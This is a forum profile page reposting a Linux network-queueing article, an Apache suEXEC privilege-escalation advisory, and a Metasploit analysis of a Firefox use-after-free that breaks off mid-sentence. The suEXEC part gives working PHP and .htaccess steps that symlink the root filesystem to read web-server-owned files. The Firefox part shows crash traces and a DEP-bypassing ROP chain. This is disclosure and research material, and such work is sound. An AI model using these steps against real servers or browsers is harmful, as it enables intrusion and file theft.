Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Queueing in the Linux Network Stack [A slightly shorter and edited version of this article appeared in the July 2013 issue of Linux Journal. Thanks to Linux Journal's great copyright policy I'm still allowed to post this on my site. Go here to subscribe to Linux Journal.] Packet queues are a core component of any network stack or device. They allow for asynchronous modules to communicate, increase performance and have the side affect of impacting latency. This article aims to explain where IP packets are queued in the Linux network stack, how interesting new latency reducing features such as BQL operate and how to control buffering for reduced latency. The figure below will be referenced throughout and modified versions presented to illustrate specific concepts. Figure 1 – Simplified high level overview of the queues on the transmit path of the Linux network stack Driver Queue (aka ring buffer) Between the IP stack and the network interface controller (NIC) lies the driver queue. This queue is typically implemented as a first-in, first-out (FIFO) ring buffer – just think of it as a fixed sized buffer. The driver queue does not contain packet data. Instead it consists of descriptors which point to other data structures called socket kernel buffers (SKBs) which hold the packet data and are used throughout the kernel. Figure 2 – Partially full driver queue with descriptors pointing to SKBs The input source for the driver queue is the IP stack which queues complete IP packets. The packets may be generated locally or received on one NIC to be routed out another when the device is functioning as an IP router. Packets added to the driver queue by the IP stack are dequeued by the hardware driver and sent across a data bus to the NIC hardware for transmission. The reason the driver queue exists is to ensure that whenever the system has data to transmit, the data is available to the NIC for immediate transmission. That is, the driver queue gives the IP stack a location to queue data asynchronously from the operation of the hardware. One alternative design would be for the NIC to ask the IP stack for data whenever the physical medium is ready to transmit. Since responding to this request cannot be instantaneous this design wastes valuable transmission opportunities resulting in lower throughput. The opposite approach would be for the IP stack to wait after a packet is created until the hardware is ready to transmit. This is also not ideal because the IP stack cannot move on to other work. Huge Packets from the Stack Most NICs have a fixed maximum transmission unit (MTU) which is the biggest frame which can be transmitted by the physical media. For Ethernet the default MTU is 1,500 bytes but some Ethernet networks support Jumbo Frames of up to 9,000 bytes. Inside IP network stack, the MTU can manifest as a limit on the size of the packets which are sent to the device for transmission. For example, if an application writes 2,000 bytes to a TCP socket then the IP stack needs to create two IP packets to keep the packet size less than or equal to a 1,500 MTU. For large data transfers the comparably small MTU causes a large number of small packets to be created and transferred through the driver queue. In order to avoid the overhead associated with a large number of packets on the transmit path, the Linux kernel implements several optimizations: TCP segmentation offload (TSO), UDP fragmentation offload (UFO) and generic segmentation offload (GSO). All of these optimizations allow the IP stack to create packets which are larger than the MTU of the outgoing NIC. For IPv4, packets as large as the IPv4 maximum of 65,536 bytes can be created and queued to the driver queue. In the case of TSO and UFO, the NIC hardware takes responsibility for breaking the single large packet into packets small enough to be transmitted on the physical interface. For NICs without hardware support, GSO performs the same operation in software immediately before queueing to the driver queue. Recall from earlier that the driver queue contains a fixed number of descriptors which each point to packets of varying sizes, Since TSO, UFO and GSO allow for much larger packets these optimizations have the side effect of greatly increasing the number of bytes which can be queued in the driver queue. Figure 3 illustrates this concept in contrast with figure 2. Figure 3 – Large packets can be sent to the NIC when TSO, UFO or GSO are enabled. This can greatly increase the number of bytes in the driver queue. While the rest of this article focuses on the transmit path it is worth noting that Linux also has receive side optimizations which operate similarly to TSO, UFO and GSO. These optimizations also have the goal of reducing per-packet overhead. Specifically, generic receive offload (GRO) allows the NIC driver to combine received packets into a single large packet which is then passed to the IP stack. When forwarding packets, GRO allows for the original packets to be reconstructed which is necessary to maintain the end-to-end nature of IP packets. However, there is one side affect, when the large packet is broken up on the transmit side of the forwarding operation it results in several packets for the flow being queued at once. This ‘micro-burst’ of packets can negatively impact inter-flow latencies. Starvation and Latency Despite its necessity and benefits, the queue between the IP stack and the hardware introduces two problems: starvation and latency. If the NIC driver wakes to pull packets off of the queue for transmission and the queue is empty the hardware will miss a transmission opportunity thereby reducing the throughput of the system. This is referred to as starvation. Note that an empty queue when the system does not have anything to transmit is not starvation – this is normal. The complication associated with avoiding starvation is that the IP stack which is filling the queue and the hardware driver draining the queue run asynchronously. Worse, the duration between fill or drain events varies with the load on the system and external conditions such as the network interface’s physical medium. For example, on a busy system the IP stack will get fewer opportunities to add packets to the buffer which increases the chances that the hardware will drain the buffer before more packets are queued. For this reason it is advantageous to have a very large buffer to reduce the probability of starvation and ensures high throughput. While a large queue is necessary for a busy system to maintain high throughput, it has the downside of allowing for the introduction of a large amount of latency. Figure 4 – Interactive packet (yellow) behind bulk flow packets (blue) Figure 4 shows a driver queue which is almost full with TCP segments for a single high bandwidth, bulk traffic flow (blue). Queued last is a packet from a VoIP or gaming flow (yellow). Interactive applications like VoIP or gaming typically emit small packets at fixed intervals which are latency sensitive while a high bandwidth data transfer generates a higher packet rate and larger packets. This higher packet rate can fill the buffer between interactive packets causing the transmission of the interactive packet to be delayed. To further illustrate this behaviour consider a scenario based on the following assumptions: A network interface which is capable of transmitting at 5 Mbit/sec or 5,000,000 bits/sec. Each packet from the bulk flow is 1,500 bytes or 12,000 bits. Each packet from the interactive flow is 500 bytes. The depth of the queue is 128 descriptors There are 127 bulk data packets and 1 interactive packet queued last. Given the above assumptions, the time required to drain the 127 bulk packets and create a transmission opportunity for the interactive packet is (127 * 12,000) / 5,000,000 = 0.304 seconds (304 milliseconds for those who think of latency in terms of ping results). This amount of latency is well beyond what is acceptable for interactive applications and this does not even represent the complete round trip time – it is only the time required transmit the packets queued before the interactive one. As described earlier, the size of the packets in the driver queue can be larger than 1,500 bytes if TSO, UFO or GSO are enabled. This makes the latency problem correspondingly worse. Large latencies introduced by oversized, unmanaged buffers is known as Bufferbloat. For a more detailed explanation of this phenomenon see Controlling Queue Delay and the Bufferbloat project. As the above discussion illustrates, choosing the correct size for the driver queue is a Goldilocks problem – it can’t be too small or throughput suffers, it can’t be too big or latency suffers. Byte Queue Limits (BQL) Byte Queue Limits (BQL) is a new feature in recent Linux kernels (> 3.3.0) which attempts to solve the problem of driver queue sizing automatically. This is accomplished by adding a layer which enables and disables queuing to the driver queue based on calculating the minimum buffer size required to avoid starvation under the current system conditions. Recall from earlier that the smaller the amount of queued data, the lower the maximum latency experienced by queued packets. It is key to understand that the actual size of the driver queue is not changed by BQL. Rather BQL calculates a limit of how much data (in bytes) can be queued at the current time. Any bytes over this limit must be held or dropped by the layers above the driver queue. The BQL mechanism operates when two events occur: when packets are enqueued to the driver queue and when a transmission to the wire has completed. A simplified version of the BQL algorithm is outlined below. LIMIT refers to the value calculated by BQL. **** ** After adding packets to the queue **** if the number of queued bytes is over the current LIMIT value then disable the queueing of more data to the driver queue Notice that the amount of queued data can exceed LIMIT because data is queued before the LIMIT check occurs. Since a large number of bytes can be queued in a single operation when TSO, UFO or GSO are enabled these throughput optimizations have the side effect of allowing a higher than desirable amount of data to be queued. If you care about latency you probably want to disable these features. See later parts of this article for how to accomplish this. The second stage of BQL is executed after the hardware has completed a transmission (simplified pseudo-code): **** ** When the hardware has completed sending a batch of packets ** (Referred to as the end of an interval) **** if the hardware was starved in the interval increase LIMIT else if the hardware was busy during the entire interval (not starved) and there are bytes to transmit decrease LIMIT by the number of bytes not transmitted in the interval if the number of queued bytes is less than LIMIT enable the queueing of more data to the buffer As you can see, BQL is based on testing whether the device was starved. If it was starved, then LIMIT is increased allowing more data to be queued which reduces the chance of starvation. If the device was busy for the entire interval and there are still bytes to be transferred in the queue then the queue is bigger than is necessary for the system under the current conditions and LIMIT is decreased to constrain the latency. A real world example may help provide a sense of how much BQL affects the amount of data which can be queued. On one of my servers the driver queue size defaults to 256 descriptors. Since the Ethernet MTU is 1,500 bytes this means up to 256 * 1,500 = 384,000 bytes can be queued to the driver queue (TSO, GSO etc are disabled or this would be much higher). However, the limit value calculated by BQL is 3,012 bytes. As you can see, BQL greatly constrains the amount of data which can be queued. An interesting aspect of BQL can be inferred from the first word in the name – byte. Unlike the size of the driver queue and most other packet queues, BQL operates on bytes. This is because the number of bytes has a more direct relationship with the time required to transmit to the physical medium than the number of packets or descriptors since the later are variably sized. BQL reduces network latency by limiting the amount of queued data to the minimum required to avoid starvation. It also has the very important side effect of moving the point where most packets are queued from the driver queue which is a simple FIFO to the queueing discipline (QDisc) layer which is capable of implementing much more complicated queueing strategies. The next section introduces the Linux QDisc layer. Queuing Disciplines (QDisc) The driver queue is a simple first in, first out (FIFO) queue. It treats all packets equally and has no capabilities for distinguishing between packets of different flows. This design keeps the NIC driver software simple and fast. Note that more advanced Ethernet and most wireless NICs support multiple independent transmission queues but similarly each of these queues is typically a FIFO. A higher layer is responsible for choosing which transmission queue to use. Sandwiched between the IP stack and the driver queue is the queueing discipline (QDisc) layer (see Figure 1). This layer implements the traffic management capabilities of the Linux kernel which include traffic classification, prioritization and rate shaping. The QDisc layer is configured through the somewhat opaque tc command. There are three key concepts to understand in the QDisc layer: QDiscs, classes and filters. The QDisc is the Linux abstraction for traffic queues which are more complex than the standard FIFO queue. This interface allows the QDisc to carry out complex queue management behaviours without requiring the IP stack or the NIC driver to be modified. By default every network interface is assigned a pfifo_fast QDisc which implements a simple three band prioritization scheme based on the TOS bits. Despite being the default, the pfifo_fast QDisc is far from the best choice because it defaults to having very deep queues (see txqueuelen below) and is not flow aware. The second concept which is closely related to the QDisc is the class. Individual QDiscs may implement classes in order to handle subsets of the traffic differently. For example, the Hierarchical Token Bucket (HTB) QDisc allows the user to configure 500Kbps and 300Kbps classes and direct traffic to each as desired. Not all QDiscs have support for multiple classes – those that do are referred to as classful QDiscs. Filters (also called classifiers) are the mechanism used to classify traffic to a particular QDisc or class. There are many different types of filters of varying complexity. u32 being the most general and the flow filter perhaps the easiest to use. The documentation for the flow filter is lacking but you can find an example in one of my QoS scripts. For more detail on QDiscs, classes and filters see the LARTC HOWTO and the tc man pages. Buffering between the transport layer and the queueing disciplines In looking at the previous figures you may have noticed that there are no packet queues above the queueing discipline layer. What this means is that the network stack places packets directly into the queueing discipline or else pushes back on the upper layers (eg socket buffer) if the queue is full. The obvious question that follows is what happens when the stack has a lot of data to send? This could occur as the result of a TCP connection with large congestion window or even worse an application sending UDP packets as fast as it can. The answer is that for a QDisc with a single queue, the same problem outlined in Figure 4 for the driver queue occurs. That is, a single high bandwidth or high packet rate flow can consume all of the space in the queue causing packet loss and adding significant latency to other flows. Even worse this creates another point of buffering where a standing queue can form which increases latency and causes problems for TCP’s RTT and congestion window size calculations. Since Linux defaults to the pfifo_fast QDisc which effectively has a single queue (because most traffic is marked with TOS=0) this phenomenon is not uncommon. As of Linux 3.6.0 (2012-09-30), the Linux kernel has a new feature called TCP Small Queues which aims to solve this problem for TCP. TCP Small Queues adds a per TCP flow limit on the number of bytes which can be queued in the QDisc and driver queue at any one time. This has the interesting side effect of causing the kernel to push back on the application earlier which allows the application to more effectively prioritize writes to the socket. At present (2012-12-28) it is still possible for single flows from other transport protocols to flood the QDisc layer. Another partial solution to transport layer flood problem which is transport layer agnostic is to use a QDisc which has many queues, ideally one per network flow. Both the Stochastic Fairness Queueing (SFQ) and Fair Queueing with Controlled Delay (fq_codel) QDiscs fit this problem nicely as they effectively have a queue per network flow. How to manipulate the queue sizes in Linux Driver Queue The ethtool command is used to control the driver queue size for Ethernet devices. ethtool also provides low level interface statistics as well as the ability to enable and disable IP stack and driver features. The -g flag to ethtool displays the driver queue (ring) parameters: [root@alpha net-next]# ethtool -g eth0 Ring parameters for eth0: Pre-set maximums: RX: 16384 RX Mini: 0 RX Jumbo: 0 TX: 16384 Current hardware settings: RX: 512 RX Mini: 0 RX Jumbo: 0 TX: 256 You can see from the above output that the driver for this NIC defaults to 256 descriptors in the transmission queue. Early in the Bufferbloat investigation it was often recommended to reduce the size of the driver queue in order to reduce latency. With the introduction of BQL (assuming your NIC driver supports it) there is no longer any reason to modify the driver queue size (see the below for how to configure BQL). Ethtool also allows you to manage optimization features such as TSO, UFO and GSO. The -k flag displays the current offload settings and -K modifies them. [dan@alpha ~]$ ethtool -k eth0 Offload parameters for eth0: rx-checksumming: off tx-checksumming: off scatter-gather: off tcp-segmentation-offload: off udp-fragmentation-offload: off generic-segmentation-offload: off generic-receive-offload: on large-receive-offload: off rx-vlan-offload: off tx-vlan-offload: off ntuple-filters: off receive-hashing: off Since TSO, GSO, UFO and GRO greatly increase the number of bytes which can be queued in the driver queue you should disable these optimizations if you want to optimize for latency over throughput. It’s doubtful you will notice any CPU impact or throughput decrease when disabling these features unless the system is handling very high data rates. Byte Queue Limits (BQL) The BQL algorithm is self tuning so you probably don’t need to mess with this too much. However, if you are concerned about optimal latencies at low bitrates then you may want override the upper limit on the calculated LIMIT value. BQL state and configuration can be found in a /sys directory based on the location and name of the NIC. On my server the directory for eth0 is: /sys/devices/pci0000:00/0000:00:14.0/net/eth0/queues/tx-0/byte_queue_limits The files in this directory are: hold_time: Time between modifying LIMIT in milliseconds. inflight: The number of queued but not yet transmitted bytes. limit: The LIMIT value calculated by BQL. 0 if BQL is not supported in the NIC driver. limit_max: A configurable maximum value for LIMIT. Set this value lower to optimize for latency. limit_min: A configurable minimum value for LIMIT. Set this value higher to optimize for throughput. To place a hard upper limit on the number of bytes which can be queued write the new value to the limit_max fie. echo "3000" > limit_max What is txqueuelen? Often in early Bufferbloat discussions the idea of statically reducing the NIC transmission queue was mentioned. The current size of the transmission queue can be obtained from the ip and ifconfig commands. Confusingly, these commands name the transmission queue length differently (bold text): [dan@alpha ~]$ ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:18:F3:51:44:10 inet addr:69.41.199.58 Bcast:69.41.199.63 Mask:255.255.255.248 inet6 addr: fe80::218:f3ff:fe51:4410/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:435033 errors:0 dropped:0 overruns:0 frame:0 TX packets:429919 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:65651219 (62.6 MiB) TX bytes:132143593 (126.0 MiB) Interrupt:23 [dan@alpha ~]$ ip link 1: lo: mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:18:f3:51:44:10 brd ff:ff:ff:ff:ff:ff The length of the transmission queue in Linux defaults to 1,000 packets which is a large amount of buffering especially at low bandwidths. The interesting question is what exactly does this variable control? This wasn’t clear to me so I spent some time spelunking in the kernel source. From what I can tell, the txqueuelen is only used as a default queue length for some of the queueing disciplines. Specifically: pfifo_fast (Linux default queueing discipline) sch_fifo sch_gred sch_htb (only for the default queue) sch_plug sch_sfb sch_teql Looking back at Figure 1, the txqueuelen parameter controls the size of the queues in the Queueing Discipline box for the QDiscs listed above. For most of these queueing disciplines, the “limit” argument on the tc command line overrides the txqueuelen default. In summary, if you do not use one of the above queueing disciplines or if you override the queue length then the txqueuelen value is meaningless. As an aside, I find it a little confusing that the ifconfig command shows low level details of the network interface such as the MAC address but the txqueuelen parameter refers to the higher level QDisc layer. It seems more appropriate for that ifconfig would show the driver queue size. The length of the transmission queue is configured with the ip or ifconfig commands. [root@alpha dan]# ip link set txqueuelen 500 dev eth0 Notice that the ip command uses “txqueuelen” but when displaying the interface details it uses “qlen” – another unfortunate inconsistency. Queueing Disciplines As introduced earlier, the Linux kernel has a large number of queueing disciplines (QDiscs) each of which implements its own packet queues and behaviour. Describing the details of how to configure each of the QDiscs is out of scope for this article. For full details see the tc man page (man tc). You can find details for each QDisc in ‘man tc qdisc-name’ (ex: ‘man tc htb’ or ‘man tc fq_codel’). LARTC is also a very useful resource but is missing information on newer features. Below are a few tips and tricks related to the tc command that may be helpful: The HTB QDisc implements a default queue which receives all packets if they are not classified with filter rules. Some other QDiscs such as DRR simply black hole traffic that is not classified. To see how many packets were not classified properly and were directly queued into the default HTB class see the direct_packets_stat in “tc qdisc show”. The HTB class hierarchy is only useful for classification not bandwidth allocation. All bandwidth allocation occurs by looking at the leaves and their associated priorities. The QDisc infrastructure identifies QDiscs and classes with major and minor numbers which are separated by a colon. The major number is the QDisc identifier and the minor number the class within that QDisc. The catch is that the tc command uses a hexadecimal representation of these numbers on the command line. Since many strings are valid in both hex and decimal (ie 10) many users don’t even realize that tc uses hex. See one of my tc scripts for how I deal with this. If you are using ADSL which is ATM (most DSL services are ATM based but newer variants such as VDSL2 are not always) based you probably want to add the “linklayer adsl” option. This accounts for the overhead which comes from breaking IP packets into a bunch of 53-byte ATM cells. If you are using PPPoE then you probably want to account for the PPPoE overhead with the ‘overhead’ parameter. TCP Small Queues The per-socket TCP queue limit can be viewed and controlled with the following /proc file: /proc/sys/net/ipv4/tcp_limit_output_bytes My understanding is that you should not need to modify this value in any normal situation. Oversized Queues Outside Of Your Control Unfortunately not all of the oversized queues which will affect your Internet performance are under your control. Most commonly the problem will lie in the device which attaches to your service provider (eg DSL or cable modem) or in the service providers equipment itself. In the later case there isn’t much you can do because there is no way to control the traffic which is sent towards you. However in the upstream direction you can shape the traffic to slightly below the link rate. This will stop the queue in the device from ever having more than a couple packets. Many residential home routers have a rate limit setting which can be used to shape below the link rate. If you are using a Linux box as a router, shaping below the link rate also allows the kernel’s queueing features to be effective. You can find many example tc scripts online including the one I use with some related performance results. Summary Queueing in packet buffers is a necessary component of any packet network both within a device and across network elements. Properly managing the size of these buffers is critical to achieving good network latency especially under load. While static buffer sizing can play a role in decreasing latency the real solution is intelligent management of the amount of queued data. This is best accomplished through dynamic schemes such as BQL and active queue management (AQM) techniques like Codel. This article outlined where packets are queued in the Linux network stack, how features related to queueing are configured and provided some guidance on how to achieve low latency. Related Links Controlling Queue Delay – A fantastic explanation of network queueing and an introduction to the Codel algorithm. Presentation of Codel at the IETF – Basically a video version of the Controlling Queue Delay article. Bufferbloat: Dark Buffers in the Internet – Early article Bufferbloat article. Linux Advanced Routing and Traffic Control Howto (LARTC) – Probably still the best documentation of the Linux tc command although it’s somewhat out of date with respect to new features such as fq_codel. TCP Small Queues on LWN Byte Queue Limits on LWN Thanks Thanks to Kevin Mason, Simon Barber, Lucas Fontes and Rami Rosen for reviewing this article and providing helpful feedback. Sursa: Queueing in the Linux Network Stack | Dan Siemon
  2. Da trimiteti-ne un PM cu IP-urile de pe care nu puteti accesa forumul, deoarece avem mici probleme tehnice cu globurile de cristal pe care le foloseam...
  3. [h=1]Apache suEXEC Privilege Elevation / Information Disclosure[/h] Apache suEXEC privilege elevation / information disclosure Discovered by Kingcope/Aug 2013 The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs. With this bug an attacker who is able to run php or cgi code inside a web hosting environment and the environment is configured to use suEXEC as a protection mechanism, he/she is able to read any file and directory on the file- system of the UNIX/Linux system with the user and group id of the apache web server. Normally php and cgi scripts are not allowed to read files with the apache user- id inside a suEXEC configured environment. Take for example this apache owned file and the php script that follows. $ ls -la /etc/testapache -rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache only user www-data should be able to read this file. $ cat test.php <?php system("id; cat /etc/testapache"); ?> When calling the php file using a webbrowser it will show... uid=1002(example) gid=1002(example) groups=1002(example) because the php script is run trough suEXEC. The script will not output the file requested because of a permissions error. Now if we create a .htaccess file with the content... Options Indexes FollowSymLinks and a php script with the content... <?php system("ln -sf / test99.php"); symlink("/", "test99.php"); // try builtin function in case when //system() is blocked ?> in the same folder ..we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'. A request to test99.php/etc/testapache done with a web browser shows.. voila! read with the apache uid/gid The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case. Version notes. Assumed is that all Apache versions are affected by this bug. apache2 -V Server version: Apache/2.2.22 (Debian) Server built: Mar 4 2013 21:32:32 Server's Module Magic Number: 20051115:30 Server loaded: APR 1.4.6, APR-Util 1.4.1 Compiled using: APR 1.4.6, APR-Util 1.4.1 Architecture: 32-bit Server MPM: Worker threaded: yes (fixed thread count) forked: yes (variable process count) Server compiled with.... -D APACHE_MPM_DIR="server/mpm/worker" -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D DYNAMIC_MODULE_LIMIT=128 -D HTTPD_ROOT="/etc/apache2" -D SUEXEC_BIN="/usr/lib/apache2/suexec" -D DEFAULT_PIDLOG="/var/run/apache2.pid" -D DEFAULT_SCOREBOARD="logs/apache_runtime_status" -D DEFAULT_ERRORLOG="logs/error_log" -D AP_TYPES_CONFIG_FILE="mime.types" -D SERVER_CONFIG_FILE="apache2.conf" Cheers, /Kingcope Sursa: Apache suEXEC Privilege Elevation / Information Disclosure
  4. Here's that FBI Firefox Exploit for You (CVE-2013-1690) Posted by sinn3r in Metasploit on Aug 7, 2013 5:02:42 PM Hello fellow hackers, I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you. During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography. The security community was amazing: within hours, we found more information such as brief analysis about the payload, simplified PoC, bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability. Brief Analysis The vulnerability was originally discovered and reported by researcher "nils". You can see his discussion about the bug on Twitter. A proof-of-concept can be found here. We began with a crash with a modified version of the PoC: eax=72622f2f ebx=000b2440 ecx=0000006e edx=00000000 esi=07adb980 edi=065dc4ac eip=014c51ed esp=000b2350 ebp=000b2354 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 xul!DocumentViewerImpl::Stop+0x58: 014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:72622f2f=???????? EAX is a value from ESI. One way to track where this allocation came from is by putting a breakpoint at moz_xmalloc: ... bu mozalloc!moz_xmalloc+0xc "r $t0=poi(esp+c); .if (@$t0==0xc4) {.printf \"Addr=0x%08x, Size=0x%08x\",eax, @$t0; .echo; k; .echo}; g" ... Addr=0x07adb980, Size=0x000000c4 ChildEBP RetAddr 0012cd00 014ee6b1 mozalloc!moz_xmalloc+0xc [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\memory\mozalloc\mozalloc.cpp @ 57] 0012cd10 013307db xul!NS_NewContentViewer+0xe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer The callstack tells us this was allocated in nsdocumentviewer.cpp, at line 497, which leads to the following function. When the DocumentViewerImpl object is created while the page is being loaded, this also triggers a malloc() with size 0xC4 to store that: nsresult NS_NewContentViewer(nsIContentViewer** aResult) { *aResult = new DocumentViewerImpl(); NS_ADDREF(*aResult); return NS_OK; } In the PoC, window.stop() is used repeatedly that's meant to stop document parsing, except they're actually not terminated, just hang. Eventually this leads to some sort of exhaustion and allows the script to continue, and the DocumentViewerImpl object lives on. And then we arrive to the next line: ownerDocument.write(). The ownerDocument.write() function is used to write to the parent frame, but the real purpose of this is to trigger xul!nsDocShell:: Destroy, which deletes DocumentViewerImpl: Free DocumentViewerImpl at: 0x073ab940ChildEBP RetAddr 000b0b84 01382f42 xul!DocumentViewerImpl::`scalar deleting destructor'+0x10000b0b8c 01306621 xul!DocumentViewerImpl::Release+0x22 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer.cpp @ 548]000b0bac 01533892 xul!nsDocShell::Destroy+0x14f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\docshell\base\nsdocshell.cpp @ 4847]000b0bc0 0142b4cc xul!nsFrameLoader::Finalize+0x29 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsframeloader.cpp @ 579]000b0be0 013f4ebd xul!nsDocument::MaybeInitializeFinalizeFrameLoaders+0xec [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 5481]000b0c04 0140c444 xul!nsDocument::EndUpdate+0xcd [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 4020]000b0c14 0145f318 xul!mozAutoDocUpdate::~mozAutoDocUpdate+0x34 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\mozautodocupdate.h @ 35]000b0ca4 014ab5ab xul!nsDocument::ResetToURI+0xf8 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2149]000b0ccc 01494a8b xul!nsHTMLDocument::ResetToURI+0x20 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 287]000b0d04 014d583a xul!nsDocument::Reset+0x6b [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2088]000b0d18 01c95c6f xul!nsHTMLDocument::Reset+0x12 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 274]000b0f84 016f6ddd xul!nsHTMLDocument::Open+0x736 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1523]000b0fe0 015015f0 xul!nsHTMLDocument::WriteCommon+0x22a4c7 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1700]000b0ff4 015e6f2e xul!nsHTMLDocument::Write+0x1a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1749]000b1124 00ae1a59 xul!nsIDOMHTMLDocument_Write+0x537 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\obj-firefox\js\xpconnect\src\dom_quickstubs.cpp @ 13705]000b1198 00ad2499 mozjs!js::InvokeKernel+0x59 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 352]000b11e8 00af638a mozjs!js::Invoke+0x209 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 396]000b1244 00a9ef36 mozjs!js::CrossCompartmentWrapper::call+0x13a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jswrapper.cpp @ 736]000b1274 00ae2061 mozjs!JSScript::ensureRanInference+0x16 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinferinlines.h @ 1584]000b12e8 00ad93fd mozjs!js::InvokeKernel+0x661 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 345] What happens next is after the ownerDocument.write() finishes, one of the window.stop() calls that used to hang begins to finish up, which brings us to xul!nsDocumentViewer::Stop. This function will access the invalid memory, and crashes. At this point you might see two different racy crashes: Either it's accessing some memory that doesn't seem to be meant for that CALL, just because that part of the memory happens to fit in there. Or you crash at mov ecx, dword ptr [eax] like the following: 0:000> reax=41414141 ebx=000b4600 ecx=0000006c edx=00000000 esi=0497c090 edi=067a24aceip=014c51ed esp=000b4510 ebp=000b4514 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206xul!DocumentViewerImpl::Stop+0x58:014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? 0:000> u . L3014c51ed 8b08 mov ecx,dword ptr [eax]014c51ef 50 push eax014c51f0 ff5104 call dword ptr [ecx+4] However, note the crash doesn't necessarily have to end in xul!nsDocumentViewer::Stop, because in order to end up this in code path, it requires two conditions, as the following demonstrates: DocumentViewerImpl::Stop(void) { NS_ASSERTION(mDocument, "Stop called too early or too late"); if (mDocument) { mDocument->StopDocumentLoad(); } if (!mHidden && (mLoaded || mStopped) && mPresContext && !mSHEntry) mPresContext->SetImageAnimationMode(imgIContainer::kDontAnimMode); mStopped = true; if (!mLoaded && mPresShell) { // These are the two conditions that must be met // If you're here, you will crash nsCOMPtrshellDeathGrip(mPresShell); mPresShell->UnsuppressPainting(); } return NS_OK; } We discovered the above possibility due to the exploit in the wild using a different path to "call dword ptr [eax+4BCh]" in function nsIDOMHTMLElement_GetInnerHTML, meaning that it actually survives in xul!nsDocumentViewer::Stop. It's also using an information leak to properly craft a NTDLL ROP chain specifically for Windows 7. The following example based on the exploit in the wild should demonstrate this, where we begin with the stack pivot: eax=120a4018 ebx=002ec00c ecx=002ebf68 edx=00000001 esi=120a3010 edi=00000001 eip=66f05c12 esp=002ebf54 ebp=002ebf8c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 xul!xpc_LocalizeContext+0x3ca3f: 66f05c12 ff90bc040000 call dword ptr [eax+4BCh] ds:0023:120a44d4=33776277 We can see that the pivot is a XCHG EAX,ESP from NTDLL: 0:000> u 77627733 L6 ntdll!__from_strstr_to_strchr+0x9b: 77627733 94 xchg eax,esp 77627734 5e pop esi 77627735 5f pop edi 77627736 8d42ff lea eax,[edx-1] 77627739 5b pop ebx 7762773a c3 ret After pivoting, it goes through the whole NTDLL ROP chain, which calls ntdll!ZwProtectVirtualMemory to bypass DEP, and then finally gains code execution: 0:000> dd /c1 esp L9 120a4024 77625f18 ; ntdll!ZwProtectVirtualMemory 120a4028 120a5010 120a402c ffffffff 120a4030 120a4044 120a4034 120a4040 120a4038 00000040 120a403c 120a4048 120a4040 00040000 120a4044 120a5010 Note: The original exploit does not seem to go against Mozilla Firefox 17 (or other buggy versions) except for Tor Browser, but you should still get a crash. We figured whoever wrote the exploit didn't really care about regular Firefox users, because apparently they got nothing to hide Metasploit Module Because of the complexity of the exploit, we've decided to do an initial release for Mozilla Firefox for now. An improved version of the exploit is already on the way, and hopefully we can get that out as soon as possible, so keep an eye on the blog and msfupdate, and stay tuned. Meanwhile, feel free to play FBI in your organization, excise that exploit on your next social 